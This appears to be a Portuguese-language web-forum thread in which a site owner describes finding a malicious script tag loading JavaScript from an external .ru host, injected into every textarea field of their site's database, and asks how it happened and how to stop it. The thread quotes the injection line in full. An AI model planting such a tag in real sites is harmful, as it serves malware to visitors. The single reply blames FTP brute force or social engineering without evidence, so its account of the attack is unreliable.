Usamos cookies para medir audiência e melhorar sua experiência. Você pode aceitar ou recusar a qualquer momento. Veja sobre o iMasters.
Caros colaboradores;
Essa semana me deparei com um certo problema.
Fiz uma pesquisa no GOOGLE, para acessar um site desenvolvido pela empresa em que trabalho. E tinha a mensagem: "Este site pode danificar seu computador." e nao deixava eu entrar no site.
Tentei entrar no site e nao consegui. Lendo alguns artigos, identifiquei que existe um MALWARE no site.
Esse MALWARE foi introduzido em todos os campos TEXTAREA, e tem alguns com o componente "WYSIWYG" que podemos organizar o texto e quando salvamos ele salva as TAGS HTML no banco.
Identifiquei que tinha essse codigo JS em todos os texArea do meu site. <script src=http://www.4vrs.ru/ngg.js></script>.
Já retirei esse codigo.
Mas o que tenho que fazer para evitar esse tipo de ataque??
alguem ja passou por isso?
Não eh meu caso.
Gostaria de saber, como meu site foi invadido, como o "hacker" conseguiu infiltrar uma tag js "malicioso" no meio dos dados do meu site.
Como o hacker fez isso? existem dois metodos básios brute force (invasão na força bruta) ou Engenharia Social (esse despreende tempo e mais desgaste) feito isso ele tem seu ftp em mãos ele pode fazer qualquer coisa que ele bem entenda.
O que você tem a fazer é alocar seus dados em um servidor mais seguro
Tópico Arquivado
Como o autor não respondeu por mais de 30 dias, o tópico foi arquivado.
Caso você seja o autor do tópico e quer reabrir, envie uma mensagem privada para um moderador da área juntamente com o link para este tópico e explique o motivo da reabertura.
Siga as instrucoes deste topico e post um log http://forum.imasters.com.br/index.php?showtopic=165906
Estou movendo apra area correta
ASP :seta: Segurança & Malwares